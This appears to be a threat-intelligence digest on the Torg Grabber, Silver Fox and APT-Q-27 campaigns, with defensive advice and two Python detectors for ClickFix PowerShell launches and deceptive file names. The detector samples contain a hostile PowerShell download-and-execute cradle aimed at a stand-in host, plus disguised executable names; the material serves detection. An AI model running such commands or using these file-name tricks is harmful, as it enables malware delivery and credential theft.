Trending Topics
Torg Grabber Infostealer Campaign: Broad-Spectrum Credential and Crypto Theft
A rapidly evolving infostealer campaign centered on “Torg Grabber” targets a wide range of sensitive data sources, with particular emphasis on cryptocurrency wallets and browser-stored credentials. The malware is distributed through ClickFix-style social engineering: a lure page silently overwrites the victim's clipboard with a malicious PowerShell command and coaches them into pasting and running it (typically in the Win+R dialog or a console), which starts a multi-stage infection chain. Once deployed, Torg Grabber leverages advanced evasion techniques, including reflective loading, direct syscalls, and in-memory execution, to avoid detection while extracting data from 25+ browsers and over 850 extensions. Its capabilities extend beyond wallets to password managers, two-factor authentication tools, messaging platforms, and local files, enabling comprehensive system compromise. The malware also profiles infected hosts, gathers hardware fingerprints, and continuously rotates its C2 infrastructure, with new domains registered weekly. Technically, Torg Grabber demonstrates a mature MaaS model, featuring a modular architecture, operator tagging, and multiple exfiltration mechanisms that have evolved from Telegram APIs to encrypted HTTPS-based REST infrastructure. Combined with anti-analysis checks, polymorphic loaders, and scalable infrastructure, Torg Grabber represents a highly adaptable and industrialized threat capable of widespread financial and identity theft across diverse victim environments.
Organizations should constrain PowerShell for standard users (Constrained Language Mode or an application-control policy) and alert on PowerShell launched from explorer.exe or a console with hidden-window, encoded-command, or download-and-execute arguments, since that is the footprint a pasted ClickFix command leaves. They should also deploy endpoint detection for in-memory and reflective-loading behaviour, and monitor for anomalous access to browser credential stores and for data exfiltration to prevent credential and wallet compromise.
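The following is an added example, not code from the digest or from the Torg Grabber report, showing the kind of process-creation check the recommendation above describes: it flags PowerShell started from explorer.exe or cmd.exe with hidden-window, encoded-command, execution-policy-bypass or download-and-execute arguments, the combination a pasted ClickFix one-liner produces. The tab-separated log format, the field names and the sample rows are all constructed for the example; map them onto your own Sysmon or EDR process-creation schema.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example, not code from the original digest or from the Torg Grabber
report. Assumptions: the log is tab-separated (timestamp, parent image,
image, command line) and the parent image is recorded; map the fields to
your own EDR or Sysmon event schema.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# A pasted ClickFix command is typed into the Win+R dialog or a console, so
# the PowerShell process is a child of explorer.exe or cmd.exe rather than
# of a scheduler, installer or management agent.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Argument features typical of clipboard-delivered one-liners.
ARG_INDICATORS = [
    ("hidden window", re.compile(r"-(?:w|win|windowstyle)\s+h(?:idden)?\b", re.I)),
    ("encoded command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("execution policy bypass", re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass\b", re.I)),
]
# A download primitive combined with an execution primitive in one command line.
DOWNLOAD_RX = re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
EXECUTE_RX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)


@dataclass
class Event:
    ts: str
    parent: str
    image: str
    cmd: str


@dataclass
class Finding:
    ts: str
    parent: str
    reasons: List[str]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> List[Event]:
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, parent, image, cmd = line.split("\t", 3)
            events.append(Event(ts, parent, image, cmd))
    return events


def assess(ev: Event) -> Optional[Finding]:
    """Return a Finding for an interactively launched PowerShell with suspicious arguments."""
    if basename(ev.image) not in POWERSHELL:
        return None
    parent = basename(ev.parent)
    if parent not in INTERACTIVE_PARENTS:
        return None  # scheduled tasks, installers, agents: out of scope for this rule
    reasons = [name for name, rx in ARG_INDICATORS if rx.search(ev.cmd)]
    if DOWNLOAD_RX.search(ev.cmd) and EXECUTE_RX.search(ev.cmd):
        reasons.append("download-and-execute cradle")
    return Finding(ev.ts, parent, reasons) if reasons else None


def scan(text: str) -> List[Finding]:
    return [f for f in map(assess, parse_log(text)) if f is not None]


# Constructed sample telemetry (not real logs): the first two rows are the
# ClickFix shape, the last three are benign launches that must not fire.
SAMPLE_ROWS = [
    ("2026-01-10T09:12:03Z", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -w hidden -ep bypass -c \"iex (irm 'http://update.example.invalid/verify')\""),
    ("2026-01-10T09:15:41Z", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoP -NonI -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("2026-01-10T10:00:00Z", r"C:\Windows\System32\svchost.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Backup\nightly.ps1"),
    ("2026-01-10T10:02:17Z", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ("2026-01-10T10:05:09Z", r"C:\Windows\System32\cmd.exe",
     r"C:\Program Files\PowerShell\7\pwsh.exe",
     "pwsh -NoLogo -Command Get-ChildItem"),
]
SAMPLE_LOG = "\n".join("\t".join(row) for row in SAMPLE_ROWS)

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} parent={f.parent}: {', '.join(f.reasons)}")
```

The parent gate is what keeps this rule quiet: an encoded or hidden-window PowerShell started by a scheduler or a management agent is routine in many estates, whereas one started from the Run dialog or a console with the same arguments almost always deserves a look. Extend INTERACTIVE_PARENTS and POWERSHELL if ClickFix variants in your environment use mshta.exe or a terminal emulator as the launcher.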
Silver Fox Tax Audit Phishing Campaign: Transition from Modular RATs to Scalable Credential Theft
The Silver Fox intrusion set has conducted a multi-wave phishing campaign leveraging tax audit lures to achieve initial access across South Asia, demonstrating a clear evolution from espionage-capable malware toward scalable, financially motivated tooling. Early operations relied on ValleyRAT delivered via malicious PDFs impersonating government tax authorities, where hidden clickable annotations triggered ZIP downloads from cloud infrastructure. These payloads deployed DLL loaders (e.g., python311.dll) to execute ValleyRAT, enabling modular post-exploitation capabilities including keylogging, remote control, and data exfiltration. By late 2025, the campaign shifted toward abusing legitimate RMM tools signed by trusted vendors, embedding C2 parameters directly within the installer's filename so that the file itself is untouched and its digital signature remains valid, evading static and signature-based detection. This transition expanded geographic targeting and improved operational stealth while maintaining the same tax-themed social engineering foundation. By early 2026, Silver Fox pivoted again, replacing RAT-based access with a custom Python stealer disguised as a WhatsApp backup utility, signaling a move toward high-volume credential harvesting and downstream fraud enablement. The stealer collects browser and application artifacts, stages them locally, and exfiltrates the data to attacker-controlled infrastructure using spoofed user-agent strings and traffic that mimics legitimate web services so that it blends into normal network activity. Artifacts such as WhatsAppData[.]zip and temporary lock files provide host-level indicators of compromise. The consistent use of culturally relevant tax and payroll lures underscores a stable initial access strategy, while the backend tooling adapts to balance stealth, scalability, and monetization across diverse victim environments.
Organizations should implement phishing-resistant MFA and block execution of unsigned or unexpected binaries from user download paths, bearing in mind that a signature check alone will not stop the abused RMM installers, which carry valid vendor signatures; restrict RMM software to the products the organization actually deploys and alert on installers for any other RMM product, including those whose filenames carry host, URL, or key=value tokens that look like connection parameters. Network detection should cover suspicious outbound traffic (e.g., spoofed user-agents and known exfiltration endpoints) to disrupt credential harvesting and remote access activity.
APT-Q-27 Web3 Support Impersonation Campaign: Multi-Stage Backdoor via Screenshot Lures
The APT-Q-27 threat group has launched a targeted campaign against Web3 customer support teams by weaponizing live chat interactions as an initial access vector. Attackers impersonate legitimate users and submit “screenshot” links that appear benign but deliver disguised executables (e.g., .pif files masquerading as images), exploiting Windows' default behavior of hiding file extensions. Once executed, the payload displays a decoy error image while silently initiating a multi-stage infection chain. The first-stage loader, often signed with abused EV certificates, retrieves a payload manifest from AWS S3 dead drops, enabling dynamic infrastructure rotation. Technically, the campaign deploys a sophisticated, layered execution chain culminating in a memory-resident Farfli backdoor. The loader establishes a hidden staging directory mimicking Windows Update paths, downloads multiple components, and leverages DLL sideloading through a legitimate signed binary (updat[.]exe) to evade detection. Payloads are decrypted and executed entirely in memory using shellcode and UPX-packed modules, leaving minimal forensic artifacts on disk. Persistence is achieved via registry Run keys (e.g., “SystemUpdats”) and service installation under deceptive names such as “Windows Eventn,” while additional techniques include UAC suppression, anti-debugging checks, and runtime string decryption. The final implant communicates with dozens of hardcoded C2 servers over TCP port 15628 using encrypted configurations, reflecting a mature, stealth-focused architecture optimized for long-term access and credential compromise in cryptocurrency-adjacent environments. 
Organizations should enforce visible file extensions, with the caveat that this does not help against .pif, .lnk, and .url files, which Explorer hides the extension of regardless of that setting (the NeverShowExt registry flag), so the screenshot-themed .pif lure still looks like an image. Beyond that, restrict execution of files received via chat platforms, sandbox all externally sourced files, monitor for anomalous staging paths under AppData that imitate Windows Update directories and for the registry Run keys and service names described above, and block outbound traffic on non-standard ports (e.g., TCP 15628). Treat the port block as a stopgap rather than a control, since the implant carries dozens of hardcoded C2 servers; default-deny egress with explicit allow-lists is the more durable way to cut off backdoor communications and prevent compromise of support environments.
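Two of the tricks described in this digest, Silver Fox's C2 parameters embedded in the filename of a signed RMM installer and APT-Q-27's executables dressed up as screenshots, are both visible in nothing more than the file name. The check below is an added example (not code from the digest or from either threat report) that scores file names for those patterns plus the related double-extension, whitespace-padding and right-to-left-override tricks. The page does not give the exact parameter syntax Silver Fox uses, so the "embedded-network-parameters" rule is an assumption that looks for generic IP, host, URL and key=value tokens; signature verification is out of scope, and the sample paths are constructed.

```python
"""Heuristic checks for deceptive file names seen in chat and download paths.

Added example, not code from the original digest or from either threat
report. Assumption: the Silver Fox RMM filenames carry host/IP/key=value
style tokens (the page only says parameters are embedded in the name).
"""
import re
from typing import Dict, List

EXECUTABLE_EXTS = {"exe", "pif", "scr", "com", "bat", "cmd", "vbs", "js", "hta", "msi", "lnk"}
IMAGE_EXTS = {"png", "jpg", "jpeg", "gif", "bmp", "webp"}
# Explorer never displays these extensions (NeverShowExt), so the
# "show file extensions" setting does not reveal them.
NEVER_SHOW_EXTS = {"pif", "lnk", "url"}

IMAGE_THEME_RX = re.compile(r"screen_?shot|image|photo|\bimg|picture", re.I)
IPV4_RX = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RX = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,6}\b", re.I)
KV_RX = re.compile(r"\b[a-z_]{2,}=[^\s&=]+", re.I)
URL_RX = re.compile(r"https?[:_-]", re.I)
RTLO = "\u202e"  # Unicode right-to-left override, reverses the visible tail of a name

DESCRIPTIONS = {
    "rtlo": "right-to-left override character in name",
    "never-show-ext": "extension is hidden by Explorer even when extensions are shown",
    "double-extension": "image extension placed in front of an executable extension",
    "space-padding": "whitespace padding pushes the real extension out of view",
    "image-theme": "image-themed name with an executable extension",
    "embedded-network-parameters": "host, IP, URL or key=value token embedded in the name",
}


def split_name(path: str) -> tuple:
    """Return (stem, lower-cased extension) of the last path component."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    stem, dot, ext = name.rpartition(".")
    return (name, "") if not dot else (stem, ext.lower())


def assess_filename(path: str) -> List[str]:
    """Return the list of rule tags that fire for this path (empty if none)."""
    tags = []
    stem, ext = split_name(path)
    if RTLO in path:
        tags.append("rtlo")
    if ext not in EXECUTABLE_EXTS:
        return tags  # the remaining rules only matter for executable types
    core = stem.rstrip()
    inner = core.rpartition(".")[2].lower()
    if ext in NEVER_SHOW_EXTS:
        tags.append("never-show-ext")
    if inner in IMAGE_EXTS:
        tags.append("double-extension")
        core = core.rpartition(".")[0]  # drop the fake image extension before further checks
    if re.search(r"\s{3,}$", stem):
        tags.append("space-padding")
    if IMAGE_THEME_RX.search(core):
        tags.append("image-theme")
    if any(rx.search(core) for rx in (IPV4_RX, HOST_RX, KV_RX, URL_RX)):
        tags.append("embedded-network-parameters")
    return tags


def scan_paths(paths: List[str]) -> Dict[str, List[str]]:
    """Map each flagged path to its rule tags; clean paths are omitted."""
    return {p: t for p in paths if (t := assess_filename(p))}


# Constructed sample paths (not from any incident): the first five should
# fire, the last two are ordinary files that must stay quiet.
SAMPLE_PATHS = [
    r"C:\Users\alice\Downloads\Screenshot_2026-01-14.png.pif",
    r"C:\Users\alice\Downloads\photo.jpg" + " " * 30 + ".exe",
    r"C:\Users\bob\Downloads\RemoteSupport_host=relay.example.test_port=443.exe",
    r"C:\Users\bob\Downloads\agent-10.20.30.40-5938.exe",
    "C:\\Users\\bob\\Downloads\\invoice" + RTLO + "fdp.exe",
    r"C:\Users\bob\Downloads\ScreenConnect.ClientSetup.exe",
    r"C:\Users\alice\Downloads\invoice.pdf",
]

if __name__ == "__main__":
    for path, tags in scan_paths(SAMPLE_PATHS).items():
        print(path)
        for tag in tags:
            print(f"  - {DESCRIPTIONS[tag]}")
```

The "never-show-ext" rule is the one most teams miss: a .pif or .lnk keeps its icon and a clean-looking name even on a workstation where extensions are displayed, so the fix the recommendation asks for has to be backed by an execution restriction on those types, not just an Explorer setting. The network-parameter rule will fire on some legitimate installers that carry a tenant or host name; it is meant to route those files for a second look against the list of RMM products the organization actually uses, not to block on its own.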
Written By: William Elchert